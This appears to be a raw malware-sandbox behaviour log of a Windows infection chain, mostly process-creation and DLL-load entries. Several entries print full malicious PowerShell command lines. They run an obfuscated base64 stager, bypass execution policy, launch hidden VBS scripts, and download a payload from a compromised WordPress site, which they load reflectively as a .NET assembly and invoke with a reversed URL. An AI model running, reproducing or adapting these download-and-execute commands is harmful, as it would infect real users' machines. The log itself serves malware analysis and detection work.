                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
